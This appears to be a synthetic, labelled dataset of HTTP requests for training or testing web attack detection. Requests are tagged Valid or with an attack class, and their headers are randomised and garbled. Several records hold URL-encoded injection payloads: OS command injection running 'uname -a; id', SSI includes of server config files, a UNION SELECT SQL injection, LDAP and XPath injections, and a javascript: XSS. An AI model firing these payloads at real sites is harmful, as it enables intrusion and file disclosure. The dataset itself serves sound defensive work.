User-Agent: Mozilla/7.7 (X11; U; Open BSD i386 1.8; re-dw; rv:5.2.6) Gecko/76472171
UA-CPU: PowerPC
UA-Disp: 666,3443,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 8348x2037
Via: HTTP/7.5 www.aepnie.html, FTP/4.8 81.103.48.185, 7.5 203.119.106.210
Transfer-Encoding: tstpi1
Upgrade: no0E/0.8, 0wmAl/6.4, eee/7.7, 81t/9.2
Warning: 577 www.soDnr.shtml "epcbtilItta9ssLe" 
X-Forwarded-For: 43.198.16.171
X-Serial-Number: 465640999525707
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19738
Start - Id: 995
class: Valid
GET /ObkB4tmpnyhaving/bt6lihp7e9lant/ubmiGZ/olrhnTeamud/eQu/05SSeSR5KWn/65dyiialpedatontlae/positionh/xS/1SsgATCp/8Al9Twd1zTjgZs1nq.gif? HTTP/1.1
Host: www.ipsAhyh.uk
Connection: keep-alive
Accept: audio/basic;q=0.3, text/*;q=0.7, audio/x-wav
Accept-Charset: x-mac-hebrew;q=0.5
Accept-Encoding: *;q=0.2
Accept-Language: sttlo-notoea
Cache-Control: ai2='ut'
Client-ip: 175.174.118.12
Cookie: ctaaeep=11;welyyG=wmDlaalfa;ouferde=ueqiSidw;sssslwmitn=rttltohef14u;ntt68=tjlma6evalTbic7;ehsl=eiiL
Cookie2: $Version="125"
Date: Sun, 21 Jan 07 07:22:10 CET
ETag: W/"bqQWfM_fZo4@EVPRM"
Expect: eehrohat=Nerxmte;latten=oEnsnsc
From: iaaeh@rEee.it
If-Modified-Since: Sat, 11 Jul 09 15:23:15 CET
If-Unmodified-Since: Sun, 27 Jan 08 20:03:21 UTC
If-Match: "qHDXO@hTNUlVDW0s_R5"
If-None-Match: *
If-Range: Thu, 01 May 08 21:50:56 UTC
Max-Forwards: 826
MIME-Version: 5.1
Pragma: esaes=hp
Proxy-Authorization: Basic aXNqdWU6b2hhZWlhc2M=
Authorization: Basic bk1pN3RhUjp1ZW5D
Range: 726319-,933-
Referer: /dmmt/toydEy/sanh/1oidt/wkaatej.asp
TE: gzip
Trailer: Cache-Control
User-Agent: a.si_UojP http://www.crms.gov
UA-CPU: PowerPC
UA-Disp: 419,762,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 873x994
Via: 1.3 4.29.3.102, 2.8 163.106.118.181:38141
Transfer-Encoding: gzip
Upgrade: sle/6.0, 2ae/5.9
Warning: 561 123.33.248.80 "ohsncetm" 
X-Forwarded-For: 162.75.24.52
X-Serial-Number: 38745
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 995
Start - Id: 12537
class: Valid
GET /rX.@Hf1Ef8t0mPe/0FL_91DzK/ere/ob.CKs7pa/dI2siue.dll?gow8hgabtgwti=stdinrlvd&mhwtzaeia=nwrw%5DSecj0gt&niefli=139102&fct=669224&agttfwuit=rcEgc%40gZXo6%40&NljB@bodyzivV=0acaLtq&iq7j=wLYMK7BI HTTP/1.0
Host: 45.88.7.230
Connection: thbr
Accept: image/*
Accept-Charset: iso-10646-ucs-2, x-mac-greek;q=0.6, windows-1254;q=0.2, hz-gb-2312
Accept-Encoding: identity, identity;q=0.9, identity, deflate, deflate
Accept-Language: od097e-leu, 4Udksgne-i, saonst-61r;q=0.9
Cache-Control: max-stale=39
Client-ip: 33.100.30.116
Cookie: twauI=78;Noi=agoInodewnjeTrsioafm~>;ylUThnnel=(tadmintuqad9oopen
Cookie2: $Version="086"
Date: Sun, 27 Dec 09 14:49:06 GMT
ETag: W/"HXrxBq@XzwUSdKt8QB"
Expect: sedlo=irnMm
From: Prazsf@rlxeoeonc.fr
If-Modified-Since: Sun, 11 Jun 06 13:39:50 UTC
If-Unmodified-Since: Tue, 29 May 07 08:30:12 CET
If-Match: "Q0JSwddaPfl2Q6ChR"
If-None-Match: "@3YGWBvamusZr.U6w3S"
If-Range: *
Max-Forwards: 82
MIME-Version: 3.3
Pragma: caEVe=t
Proxy-Authorization: Digest cnonce="n2nnrtat"
Authorization: Basic Y2VlcmI1cTpjcnJEZA==
Range: 79521-822865,4-
Referer: /a2bsox/cpaepii/pse6inr.cfm
TE: trailers,trailers,trailers
Trailer: Accept-Language
User-Agent: tzajyg/6.9.1
UA-CPU: PowerPC
UA-Disp: 3658,3398,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 366x415
Via: 9.9 112.116.113.230, 6.6 www.nmax.htm, 1.1 201.55.241.211
Transfer-Encoding: identity
Upgrade: AGSes/3.1
Warning: 009 www.ecnv.tiff "tiind6peciKeh3" 
X-Forwarded-For: 134.103.218.48
X-Serial-Number: 2197491883894
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12537
Start - Id: 36956
class: LdapInjection
GET /nm8m7LvB5Dl8wWwufiBs/hLM/io/nRc1jZJDco2ED/c1brEarv32n5oezgacli/las9e/ukYb/ju9mtern/aSE-KR/L4oEbQqeBp.html?brsaoz=thQD&ihleaeTsUTaaE=e%3E%24ohaeiW2s&bli=12&ecaiOoblwRo3nY=43de8yterth&tssnog5rdT=eTu1mrTr&yw5ut4ea5ce=tBStAEzK&ZSfromsGt9pBhome6=%7E&wl9haac=%29+%28%7C%28displayName%3Dhad*%29++%28name++%3D+++had*+%29%28+++mail%3Dhad*++%29&iytcelepc4h=e HTTP/1.1
Host: www.tnsSfa.uk
Connection: keep-alive
Accept: */*
Accept-Charset: utf-8
Accept-Encoding: 
Cookie: hhltemi5rNg=ibiiys7nb;ids6ecnpaieur5=n7YM--5STEb;wyhtcot1lDs1kNk=sexecelraOatT;no7nox=567551720;uttibMysprrcaPz=xRo r
Date: Mon, 06 Dec 04 15:44:03 CET
From: lctistgh@ttefnPoeRd.gov
If-Range: Mon, 25 Feb 08 24:01:11 UTC
Referer: http://www.m77ctekN.it/aeob/hDI9ol/lyh66mn.asp
User-Agent: ahwMPLaA http://www.jes3nn.org
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36956
Start - Id: 43599
class: OsCommanding
GET /Ofitn9uTirgRubaii2a/nQcmhhx_ie7jzli/tbNQ3.pl?5neheonufthhYgV=resnxoaqe0isr&8ur4Otkm=++++%3B+++++echo+++++%3Bw++++%3B+++uname+-a++++%3B+id HTTP/1.1
Host: www.iBbH3eynar.org
Connection: close
Accept: text/*;q=0.2
Accept-Charset: iso-8859-8-i;q=0.2
Accept-Encoding: *
Accept-Language: *;q=0.1
Date: Mon, 11 Dec 06 16:52:23 CET
If-Unmodified-Since: Wed, 17 Feb 10 23:28:52 UTC
If-Range: *
Authorization: NTLM NWhPcjByb2VhZTBhZGE2c2VpY3J3Y2xrdHZJbWV5U29uYXNvcGVld24=
Referer: http://www.dImthS.com/Gtxr9E/ucoHar.doc
User-Agent: ihye29fw32ygshu6ir
Via: 6.6 www.lrl68aE.shtml

null

End - Id: 43599
Start - Id: 47392
class: XSS
GET /kyHNM/t8wbl/72MwWr9ja/owgB83DX6EHZq83w-.shtml?aofdn=34564858&noatremthjon=6311&BObPrRCH=stp&er=seDimgt&ESBfLQ4LN=6noba&0nwT_OJrhO=FtmptOes+havingt&1LocEunionGM=javascript%3A++alert%28++%22nseVtn.esuen%22%29&dWBlink=2&ttrdiacdyEe=307408&dl=016407&phzsoathlep=5588517&rersF5ewdna=859 HTTP/1.1
Host: 67.81.150.138:80
Connection: 55dmLrt8
Accept: */*
Accept-Charset: windows-1251;q=0.1, koi8-r;q=0.9, iso-8859-5
Accept-Encoding: gzip, compress
Accept-Language: *;q=0.0
Cache-Control: max-stale=43
Client-ip: 19.40.104.14
Cookie: S5zVAJchildOSp=fiatm ;toosowg=dHootqil;ie=9091
Cookie2: $Version="92"
Date: Sat, 16 Sep 06 23:03:30 GMT
ETag: W/"Zs@tcgHlxs@J9KnP77n"
Expect: 100-continue
From: hoetafry@daffCU.org
If-Modified-Since: Fri, 12 Nov 04 03:42:00 GMT
If-Unmodified-Since: Sun, 14 Mar 04 12:22:18 GMT
If-Match: "4Y8nSEt-_TiAm7GBoO6"
If-None-Match: *
If-Range: Sun, 01 Nov 09 02:51:13 GMT
Max-Forwards: 8508
MIME-Version: 4.8
Pragma: u='a'
Proxy-Authorization: cHest eInm=wotttdoe
Authorization: NTLM ZWFldnJyZXNBbU5naW1JbnRlY3B0dnJyZXN6b2VjbnJlc2Vz
Range: 35419-,75138-2674,165640-
Referer: /tyih/caaAga/uittoE/horer6Ui.nsf
TE: chunked;q=0.4,chunked;q=0.7,trailers
Trailer: Expect
User-Agent: Mozilla/4.9 (Machintosh; U; Mac OS X 4.7; ti-ts; rv:3.2.6) Gecko/76322676
UA-CPU: StrongARM
UA-Disp: 7745,5252,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 1670x058
Via: FTP/3.6 www.eavf.css, FTP/5.3 www.yMsndc.shtml
Transfer-Encoding: iwizw
Upgrade: uns/4.6, rb2/9.4, tsywas/1.7, Onrj/5.3, anii/8.9
Warning: 270 120.123.100.132 "hvi74Edbooyr" "Mon, 07 Jan 08 14:05:19 UTC"
X-Forwarded-For: 39.101.79.171
X-Serial-Number: 6529673477463
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 47392
Start - Id: 34210
class: Valid
PUT /Hscript9Kk6ALrZ/6lLtFDpasswdd-6/imfRo2DK@y6AxqEoISxD/PUS99I6WO/tfOBJEg1iFmmO5vGf6e0/dcmd2lhea2yefpiiinnt/aqb/iqsefaogiyvsa7r53E/1rgireIdslttEeb/rgnoIrlI5kB0vP0Lg/tTq-SlPay3o-8Ase.jpg? HTTP/1.1
Content-Length: 266
Content-Language: d
Content-Encoding: gzip
Content-Location: /fkslev/wtghiz/e8wkb/Ojx6.wav
Content-MD5: Nm9zZUNpb3JFMEVPbWIzbg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 14 Jan 05 22:22:58 CET
Last-Modified: Fri, 26 Aug 05 08:14:23 CET
Host: 4.194.130.222
Connection: close
Accept: application/postscript;q=0.3, image/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 76.113.209.101
Cookie: slwq=389883451;vsolamahE=464261;ozmoelAoRurFl=oF1lM0_;hvm8bidd029=l5tpttaoeejrbrtlqn;HQRP_yk=forma
Cookie2: $Version="29"
Date: Thu, 08 Apr 04 08:12:04 GMT
ETag: "Gg1B1yaE-jhaS2.AN"
Expect: 100-continue
From: tmwyT@acvot.it
If-Modified-Since: Wed, 19 Dec 07 14:44:55 CET
If-Unmodified-Since: Mon, 17 Dec 07 09:12:24 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 15 Mar 06 07:33:39 GMT
Max-Forwards: 79
MIME-Version: 8.9
Pragma: tsoeGkw='R'
Proxy-Authorization: rA7c8 nenemLe=9ycepn1
Authorization: Digest uri=http://www.eehr2i.de/T6id/lbese/6olru.mdb
Range: -23,2252-463,93059-
Referer: /2dno/dhihigs/Rssha.jpg
TE: deflate;q=0.0,gzip;q=0.4,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/5.6 (X11; U; Open BSD i386 0.1; ZI-pn; rv:9.5.4) Gecko/47465349
UA-CPU: x86
UA-Disp: 5943,076,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 306x913
Via: 6.8 242.227.51.87:91755, FTP/4.8 79.240.235.203, FTP/1.3 145.112.189.172
Transfer-Encoding: compress
Upgrade: ey6gg/6.4, mid/9.0, tq0u/3.6, tt7tio/5.3, foheo/4.7
Warning: 362 134.85.191.186 "tsdieztetsthntthlbia" "Sun, 24 Dec 06 07:54:11 UTC"
X-Forwarded-For: 132.189.89.54
X-Serial-Number: 7747668675736673
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

euhoay=EemozeogrT5v&ug4g8rni0e2=352&atioTslfn6Eei6=988082&rOVoieirz8ue=trmhh&eAmnetcat8Sv7bmetaPp=e&riheho=|Rgueginsertlstj:r&h8ito2=2OeaAih&eaq2tdgcignin=eymvad&mnell=r4xtermeuwhfcora)ii&sieee=twkxkE&kt4ioadr=6eTnheNstyleue&CcodheO=6laAndhFere&oboiszx=nmagthy

End - Id: 34210
Start - Id: 40630
class: SSI
GET /tTbl10-hgkpHh/l.N8.zCH1s/93my2/x7/Adtijtsqginl0a6ees7l/tUeEOn4__3.KpY/cqknetsAleuothHepr/67OBe-3zH/r7eso/atksBe.shtml?boot.iniAdlp-f=7qb&hxserla99eTem7x=+rrg&cad=esBowiosdni&edWrss1a=%3C%21--++++%23include+virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+++++--%3E HTTP/1.0
Host: 98.28.210.11:9829
Connection: keep-alive
Accept: audio/*;q=0.9
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: tlhDtaos='oestktf6'
Client-ip: 90.139.110.154
Cookie: rraoo=22520
Cookie2: $Version="00"
Date: Thu, 03 Apr 08 05:09:07 CET
ETag: "7VJuCsYpLjlxhDcl"
Expect: 100-continue
From: 0huf@noaNaeeh.cz
If-Modified-Since: Fri, 30 May 08 18:45:26 UTC
If-Unmodified-Since: Tue, 29 May 07 23:04:58 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 31 Dec 04 24:39:31 GMT
Max-Forwards: 813
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: sazlte neuhunTs=Hdeoarhe
Authorization: Digest response="Ff9EC2B1e9fE4DADB141B3f349Fb2BAF"
Range: -916,268-761609,54-38396
Referer: http://www.0boe29a.be/hnliampo/cf1eooh.gif
TE: trailers
Trailer: If-Match
User-Agent: iqheec/0.8.5.3
UA-Disp: 959,926,32
UA-OS: Win9x
UA-Color: color16
Via: afeire/7.6 www.nGNm.png:7, FTP/7.6 www.batot.gif, 3.2 www.ndsreo.shtml
Transfer-Encoding: deflate
Upgrade: Rmh/4.4, haai/8.8, sr7/0.2, 8syo/9.3, invat/6.5
Warning: 793 www.tAdehm.html "tqeeqiTsmsat" "Sat, 08 Apr 06 21:20:58 GMT"
X-Forwarded-For: 130.86.64.49
X-Serial-Number: 9481598521
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40630
Start - Id: 38654
class: LdapInjection
GET /sUxVW9j/tslf/9vZsamCByBgtmpkL/6aonmbrd/omG9LOEIdfq.rYY/cawadter8ono/dbMdemDMGxh.tiff?eqhianQimtg=1621519&disedrlsh=2992&QCG2TI=rmnph-rlth3e+n%40%2Bxterm&SElER=%29++++%28++%7C+++%284tQah%3DSxe*%29&rEe=61951&81oitmd5=%3Ceeineostdinnokc&dndimepyIa=6 HTTP/1.0
Host: 157.49.76.193
Connection: close
Accept: audio/basic;q=0.8, text/plain, video/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 48.249.181.128
Cookie: 4pee=a.vF6.l;za4dnhnqcyesto=9126;ynO9no=mo1smnti4am4tbe;6e92D1vdocument8n=i9WwZB9x_hi
Cookie2: $Version="2"
Date: Mon, 03 May 04 04:52:25 GMT
ETag: W/"C_oEOWbf.c0XOh-@yGhp"
Expect: wof9
From: t4byed8@l9nss.fr
If-Modified-Since: Mon, 16 Mar 09 13:40:32 CET
If-Unmodified-Since: Tue, 30 Dec 08 15:56:34 CET
If-Match: *
If-None-Match: "pPAnsv_3O0Ux_Q_-hc-O"
If-Range: *
Max-Forwards: 5071
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: Basic YUtqaWUxOmFkTHI=
Authorization: Digest username="xioo"
Range: 6-,-12392,3-
Referer: http://bIndrNct.be/drani/dernndsl.htm
TE: chunked;q=0.2,gzip;q=0.4
Trailer: Accept-Encoding
User-Agent: 6rrsrljelnet
UA-CPU: PowerPC
UA-Disp: 397,637,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 774x1723
Via: 0.9 156.188.205.170
Transfer-Encoding: compress
Upgrade: htaa/3.0, ralts/8.0, setesh/3.4, ildF/3.2, ingq/2.6
Warning: 923 31.36.82.245:31824 "1y3pAs" "Sun, 03 Oct 04 18:11:26 UTC"
X-Forwarded-For: 72.129.37.147
X-Serial-Number: 15901278083
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 38654
Start - Id: 42643
class: SqlInjection
GET /twlss0Oun0w6E.mspx?c5tnsnjsnsr6e=o6%2F&aa1onpi=autoexecwp-h&EexecChpasswdE=641&Ei=iin&ns7et5m3i=%27+++%29+++++UN%2F**%2FION++ALL+SEL%2F**%2FECT+++++%27rio%27%2C3%2C6252%2C%27meo%27%2C9+FROM+5eliwa5++WHERE++++%28++%27%27%3D+%27&pnjryaL=o61&m0isk3s3aun0=olTeshi&dSwjiRuu81lu=4rllteb8enavC&XOPp3A.7Jxz=e+pm&CsaLgoA8t=NtnentxncmlpgpfpM HTTP/1.0
Host: www.Scme.org
Connection: aT7nener
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: identity;q=0.8, compress;q=0.5, gzip
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 197.218.35.22
Cookie: EnullC1TzJreplaceg=83oM
Cookie2: $Version="792"
Date: Sun, 03 Apr 05 16:34:04 UTC
ETag: "w8Zou2YQekyqpbQNzJ"
Expect: 100-continue
From: z74ht@xqb9ivEose.gov
If-Modified-Since: Mon, 08 Oct 07 22:05:15 UTC
If-Unmodified-Since: Thu, 13 Jul 06 14:40:50 GMT
If-Match: "ExamKPEtgjPtMRyFq"
If-None-Match: "t3ZZn9T7aZU5gRt"
If-Range: "JhqSUbSa-qg9_lWlJi"
Max-Forwards: 5088
MIME-Version: 3.2
Pragma: ac=lioT
Proxy-Authorization: NTLM bW9tc2VkRWh1Y21SbnRPbmJ0ZUNhZXllVGVoMm9lbHRQZ3Vt
Authorization: Digest nonce
Range: 72326-9838
Referer: http://wnel.uk/nrraEh.swf
TE: chunked
Trailer: Max-Forwards
User-Agent: Mozilla/8.2 (Machintosh; U; PPC Mac OS X 3.2; s0-is; rv:7.6.2) Gecko/64317658
UA-CPU: PowerPC
UA-Disp: 4133,8176,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 4720x346
Via: FTP/0.7 136.93.198.77:38
Transfer-Encoding: deflate
Upgrade: hoefdi/5.8, afmr09/0.6, fgj/9.1, mds/0.8, 8sseh/8.0
Warning: 577 221.133.112.12 "Eaaers" 
X-Forwarded-For: 32.163.55.249
X-Serial-Number: 81024686129
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 42643
Start - Id: 20172
class: Valid
GET /hreAnwuOv/ssohdl/enp9rttctecaseeltag/e@Lhp_0wN68Tg7ZnXk_/aPvLpZ1t0a3lc38/a.aHNH.asmx? HTTP/1.0
Host: 222.154.2.7
Connection: close
Accept: text/html
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: no-transform
Client-ip: 100.194.137.24
Cookie: euinses=4888509
Cookie2: $Version="340"
Date: Sat, 16 Dec 06 16:05:18 GMT
ETag: "LhbXXjSjhIjjWA0Ecn7e"
Expect: rawnlm=hehotset
From: eosoO@enstol2ni.de
If-Modified-Since: Mon, 10 Apr 06 06:54:20 UTC
If-Unmodified-Since: Mon, 20 Dec 04 18:37:49 CET
If-Match: *
If-None-Match: "_k.@0osY@IAoIrVn"
If-Range: Wed, 05 Dec 07 05:21:37 CET
Max-Forwards: 769
MIME-Version: 4.6
Pragma: ecMactc='d1v2mzrA'
Proxy-Authorization: Digest nonce
Authorization: Digest username="eliuoo"
Range: 365749-,607-065
Referer: /teeerhil/tsoo/9ein/coKscit.gif
TE: trailers
Trailer: TE
User-Agent: u7V0aL8 http://www.8varnyra.gov
UA-CPU: PowerPC
UA-Disp: 6636,6727,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 297x878
Via: FTP/0.0 26.234.112.57, gNaroE/5.4 www.6un6bt.css:5, HTTP/3.0 www.pjog.htm
Transfer-Encoding: gzip
Upgrade: oieit/1.6, oam/2.4, hter/6.0, edl/2.6, anna/8.1
Warning: 651 88.213.252.125:060 "5sir4foalundnc" "Thu, 24 Mar 05 09:39:40 CET"
X-Forwarded-For: 108.223.104.239
X-Serial-Number: 818940289037897740
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20172
Start - Id: 39610
class: SSI
GET /null0Z/e5sj-9eSSM6rpWCr/FbVj/Yjo/gi9otnaettt/2spc/6iTJz/uAt_Z/wuOMggJE/0oiS599stttaaLwxs.jpg?zaEs=%3C%21--++++%23include+++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22+++++--%3E HTTP/1.1
Host: 47.225.149.10
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: deflate
Accept-Language: *
Cache-Control: no-store
Client-ip: 56.53.233.183
Cookie: Eaobctsxt7h3=rhvc0iPfflgp;fWG29gYhttpsED37=lsstetdnnasnoewem;xsrpeH2Oiba5Eg=lhf8tsHo;nEraead1ty=nlt
Cookie2: $Version="6"
Date: Tue, 30 Mar 10 12:53:39 UTC
ETag: W/"IE2M@YnI7GUSNjVKUu_O"
Expect: 100-continue
From: ts3vhh@kqzfn.com
If-Modified-Since: Tue, 17 Jul 07 04:04:30 CET
If-Unmodified-Since: Fri, 18 May 07 20:11:32 UTC
If-Match: *
If-None-Match: "9gDItaoDY70HQyx4"
If-Range: "08my99QpmNFuY_JTS2"
Max-Forwards: 7
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: yn3o7 beia=nuSE
Authorization: Digest qop=uncT
Range: 973-,-4,32221-
Referer: http://skerelre.gov/tz8mmR/tourrs.jpg
TE: trailers,trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/6.0 (X11; U; Open BSD i386 7.4; ed-pe; rv:9.6.3) Gecko/65648438
UA-CPU: PowerPC
UA-Disp: 150,287,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 1841x260
Via: d2miyr/5.8 www.d0i3piEl.jpg, ldhnVo/8.5 220.160.63.121:47762
Transfer-Encoding: compress
Upgrade: i4uts/0.2, aesNA/6.1
Warning: 438 147.77.52.61 "asjnh0na0txeitfAswd" "Wed, 19 Nov 08 03:37:46 CET"
X-Forwarded-For: 216.187.237.43
X-Serial-Number: 224017819
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39610
Start - Id: 29635
class: Valid
GET /i-ms/AZJWsystemBq3sIsNDmJ/ytefonun/iuOq/ipE3JGs@hmJN/dGWgDC.USX/izt5yxCJc9/nOFUvhHt36M/tozaL4f0OjeeN5ifi.png?anTyrrasls6R=e5eE&.-Jsw8@=samivnhdropse5eomllT&tntst3fmeoa=99562635&esot9ioatwsd=zfj&wgetrxYv6=7noaOJ+yewR%2Ft&j3qQk=835879 HTTP/1.1
Host: 21.168.181.104
Connection: close
Accept: */*;q=0.3
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.9
Accept-Language: 4-h;q=0.5, ntdhjto-8lsete, etFn-noaht, hetcseos-2tw8, ht86hal-1c
Cache-Control: only-if-cached
Client-ip: 180.238.202.202
Cookie: 9ttzKeKeJqgs=lRi;Seaeo=kotAeuA7apinVEa;@.evalus=walrtfhisit;9NrmU=05757204
Cookie2: $Version="31"
Date: Tue, 18 Jan 05 11:31:34 CET
ETag: W/"ErMsT7EddP98e31."
Expect: 100-continue
From: serlgoma@7stltqn9.org
If-Modified-Since: Thu, 25 Jun 09 15:45:28 CET
If-Unmodified-Since: Sat, 20 Jun 09 11:23:39 UTC
If-Match: "sRGzHQRIwzcxBT2HN38Q"
If-None-Match: *
If-Range: *
Max-Forwards: 217
MIME-Version: 0.3
Pragma: lmeee=ao
Proxy-Authorization: Digest username="zohhys"
Authorization: Basic dGpyZjptYnUy
Range: -146,1-593943,-3282
Referer: /fioWlkdi/2hwn/ttRh/FdEdtoil/ztnacqse.jpg
TE: trailers,gzip
Trailer: If-Unmodified-Since
User-Agent: Mozilla/1.8 (X11; U; Solaris 0.0; 9c-De; rv:3.4.9) Gecko/97612331
UA-CPU: MIPS
UA-Disp: 488,829,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 423x5834
Via: lcu/1.5 242.222.179.46
Transfer-Encoding: gzip
Upgrade: tdet/1.8, gtr/7.8, l8sivs/5.8, aedub/5.6, a2nlas/3.5
Warning: 402 www.rtrtomG9.htm "notgi1apft" 
X-Forwarded-For: 193.139.126.154
X-Serial-Number: 41855
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29635
Start - Id: 35686
class: XPathInjection
GET /nt/lgvar/mr0_yz/tfagelnssstsspared9/Ea7lgv2.sh?4lnxtanau8noeit=Xdhzehtebtelnetol%2FNo&gSt3nmDsT=35924799&rtdM7=7063&ujehRoiTo7=425943&IisaxAstp=ed8majnSE&mwttnae0=%5D+mail%3AeKun7a&yjnm7a5e=322+++or+1%3C+rai48%2FyeiecD%2FOuwttl%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D20%5D+++++or+++7838%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&bsemhera=7ewemiy&ksZZopentyh=edadckfe6s7hiaernt HTTP/1.1
Host: 226.60.156.167
Connection: keep-alive
Accept: audio/*;q=0.7, audio/*, text/plain;q=0.7
Accept-Charset: *
Accept-Encoding: gzip, compress;q=0.5, deflate, gzip;q=0.7
Accept-Language: e7ar-anat;q=0.2, lridzwtk-achi
Cache-Control: no-transform
Client-ip: 50.131.48.51
Cookie: 4hoeoLkVeedmen=7;bfra=hrcp;rmYFFtCnWaq=nph-e;gus07tcu8=4mlvniembyme
Cookie2: $Version="3"
Date: Fri, 04 Jan 08 01:51:19 CET
ETag: W/"k1U73-zB@DVFTOX"
Expect: dOaiscoo
From: tgaZ6rhn@dneNoaa.uk
If-Modified-Since: Sun, 17 Aug 08 24:21:45 CET
If-Unmodified-Since: Tue, 28 Jul 09 24:00:46 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 19 Jun 05 02:17:13 GMT
Max-Forwards: 84
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: NTLM Nm9LZW05b2hud3NldTBzbWxlbnplYWVidEYyZGVXQWRkbmlsb1Vua2xuMHNybnRl
Authorization: onlo kocbiisi=iNbo9ksy
Range: -82,-22
Referer: /snAfpfrl/nFeLtnjs/iycjalle.sh
TE: chunked;q=0.2,chunked;q=0.6,trailers
Trailer: Accept-Charset
User-Agent: reienhfeg
UA-CPU: PowerPC
UA-Disp: 7059,6973,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 656x763
Via: 8.8 86.46.65.221, 2.3 81.113.129.190, FTP/1.3 www.td8tP.shtml:1
Transfer-Encoding: albn; mniyi=enrne
Upgrade: pnarot/3.1, 7tgym/1.5
Warning: 134 179.206.30.120 "oxtqt" "Tue, 25 Sep 07 03:29:34 CET"
X-Forwarded-For: 214.86.27.10
X-Serial-Number: 727389738621693748
----: ---------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 35686
Start - Id: 18242
class: Valid
GET /n5FbXdjFcxspz7.C8ld/eCf4uZwQ.psQByX5pMJJ/rYIQWw98Glocationnkdgf/hbajynlfcNehllevldt/l65i5zytFWSsuYpR0/vq6t-Imk/@JU.nHeFtPt/o@@S1w-btD0nMpkbHh/sv7frU/jtE/aGx-HqrERVbXl.jpeg?WJ_ATyaJ=%27ueuLautoexectmeAnse&insistraeeaoiqU=0&eclE8ewrh=reeimnrtn&s37sbuhclesR=5&olohm9snpt=hcmomidisxyc&canreci9b=ets%7Eformre%2Fiudnxpe&noGdranpdpeUlar=etedgzR&arng=omYI8rsL8&utIttwesem=51920096&tRda=lnrtntoa HTTP/1.1
Host: 13.83.226.191
Connection: keep-alive
Accept: application/*;q=0.6, audio/x-wav;q=0.3
Accept-Charset: isiri-3342;q=0.0, us-ascii;q=0.8, utf-8;q=0.6, us-ascii;q=0.5, iso-8859-2;q=0.2
Accept-Encoding: 
Accept-Language: 6J-fbg2rsso;q=0.0, ea4jy-ara, h-tct9tT;q=0.4, 7iOieiTd-raaitpnh
Cache-Control: min-fresh=05
Client-ip: 12.11.189.0
Cookie: it=bmochagiolibbeltHhudp;2ct@metaaHwinntbgsound=wde1nebodyjunionro;afdtE2=:sacdu;inputxml8RxKupdateD9=llvWyt6vhe;feKeauemL=o kee
Cookie2: $Version="362"
Date: Sun, 10 Oct 04 03:12:03 CET
ETag: W/"_nMYwh1.95W4WOl"
Expect: o29hinWi=snxpo
From: anwits@qdrec.org
If-Modified-Since: Sat, 03 Jan 09 14:14:09 CET
If-Unmodified-Since: Tue, 12 Sep 06 10:40:37 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 06 Apr 09 18:19:45 UTC
Max-Forwards: 2248
MIME-Version: 0.2
Pragma: r='aLwkoett'
Proxy-Authorization: Basic dGV0OGVkazp0aW9scQ==
Authorization: sns8 gludebh=iATsy
Range: 41-16
Referer: http://www.ed18p9.biz/ihle/vrktmm.zip
TE: trailers,gzip;q=0.6
Trailer: If-Modified-Since
User-Agent: tttmc/1.3.5
UA-CPU: PowerPC
UA-Disp: 713,1321,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 1021x3555
